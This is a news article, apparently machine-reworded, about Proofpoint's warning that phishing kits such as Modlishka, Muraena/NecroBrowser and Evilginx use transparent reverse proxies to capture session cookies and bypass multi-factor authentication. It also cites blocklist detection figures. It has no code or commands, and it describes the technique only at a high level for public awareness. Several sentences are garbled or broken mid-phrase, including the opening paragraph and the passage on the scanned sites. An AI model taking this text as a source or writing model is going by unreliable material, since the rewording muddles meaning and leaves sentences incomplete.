In the beginning we had passwords. Their hacking ability angered many people and the password was widely considered a bad move. Then we had two-factor authentication – and now criminals can start bypassing them with transparent reverse proxies online, according to Proofpoint.
Phishing kits, readymade deployables used by crooks to steal victims’ login details, are increasingly capable of bypassing multi-factor authentication (MFA), the company warned today.
In a blog post Proofpoint stated that it sees “multiple MFA phishing kits ranging from simple open-source kits with human readable code and no-frills functionality to sophisticated kits using multiple layers and built-in modules that handle usernames, allow theft of passwords. MFA tokens, social security numbers and credit card numbers.”
Naming the three specialized MFA-bypassing phishing kits (Modlishka, Muraena/NecroBrowser, and Evilginx), Proofpoint said they are deployed via ready-made phishing domains; Sites that falsely masquerade as genuine sites that victims wish to log into. These are usually bank websites, email or storage providers, and so on – anything that is going to be exploitable for criminals to have valuable information.
The reverse proxy concept is simple: fooling users into visiting a phishing page, using a reverse proxy to get all the legitimate content a user expects, including login pages, and sniffing their traffic while passing through the proxy. This way criminals can intercept valid session cookies and bypass the need to authenticate with a username, password and 2FA token.
Proofpoint said it deployed an in-house machine learning tool called Foca and learned that more than 1,200 phishing sites were scanned, deploying reverse proxies to fetch the content of the real websites, duplicating the fake site as the real deal. was passing as
“Of those 1200+ sites, only 43.7 percent of domains and 18.9 percent of IP addresses appeared on popular blocklists like VirusTotal,” the firm said.
Reverse proxy phishing kits are an evolution of, so Proofpoint said, the age-old man-in-the-middle (MITM) concept. In common usage a reverse proxy sits in front of a server or group of servers and directs traffic to them, which we explained a few years ago in discussing the yet-to-be-death of IPv4. One use of a reverse proxy can be a load balancer. They are sometimes called “transparent” because as the user wants to access the server behind the proxy, the traffic all comes from the same public IP address.
With apologies to the late, great Douglas Adams for the top paragraph.